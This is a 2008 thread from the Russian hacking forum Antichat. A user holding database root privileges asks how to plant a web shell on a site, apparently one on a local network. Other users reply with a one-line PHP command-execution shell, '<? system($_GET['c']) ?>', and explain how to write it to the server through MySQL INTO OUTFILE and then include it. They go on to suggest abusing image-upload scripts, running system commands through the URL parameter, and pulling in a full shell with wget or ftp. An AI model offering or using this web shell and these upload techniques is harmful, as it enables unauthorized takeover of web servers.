Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
08.09.2008, 19:52
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
File_priv
Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
1)root-права
2)c://www/www/index.php (знаю путь)
3)ну естественно File_priv=Y
Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться
Или как узнать префикс? (там самописный сайт,локалка) =\
|
|
|
08.09.2008, 20:25
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Фишка в том,что отклюбчен удаленный инклуд,
Warning: include() [function.include]: URL file-access is disabled in the server configuration
оцтой =\
Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
|
|
|
|
08.09.2008, 20:42
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
самый маленький шелл это
<? system($_GET[c]) ?>
записываешь через инто аутфайл и инклудишь
Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
|
|
|
|
08.09.2008, 21:09
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
PHP код:
<? system($_GET['c']); ?>
так правильнее. |
|
|
|
09.09.2008, 05:12
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Spyder
самый маленький шелл это
<? system($_GET[c]) ?>
записываешь через инто аутфайл и инклудишь
Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
Воспользовался конструкцие как у Спайдера,но не умею юзать я его,к сожалению =\
Как там директорию посмотреть ...php?c=-ls la?
Как с этого залить полноценный шелл? wget?
zДайте пожалуйста полную констркуцию запроса =)
ЗЫ: .php?c= echo "qwe"; -сработало xD
Последний раз редактировалось DDoSька; 09.09.2008 в 05:14..
|
|
|
|
09.09.2008, 05:21
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Как там директорию посмотреть ...php?c=-ls la?
Если там ОС винда то .php?c=dir,так же смд камандами пытайся сделать все что хочешь=)
|
|
|
|
09.09.2008, 05:29
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Extremal
Если там ОС винда то .php?c=dir,так же смд камандами пытайся сделать все что хочешь=)
теперь я немного опнял...
то есть если я наберу ?c=regedit,то у него вылезит на столе реестр?Что еще посоветуете...кроме "dir" ?
|
|
|
|
09.09.2008, 05:45
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
ftp
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
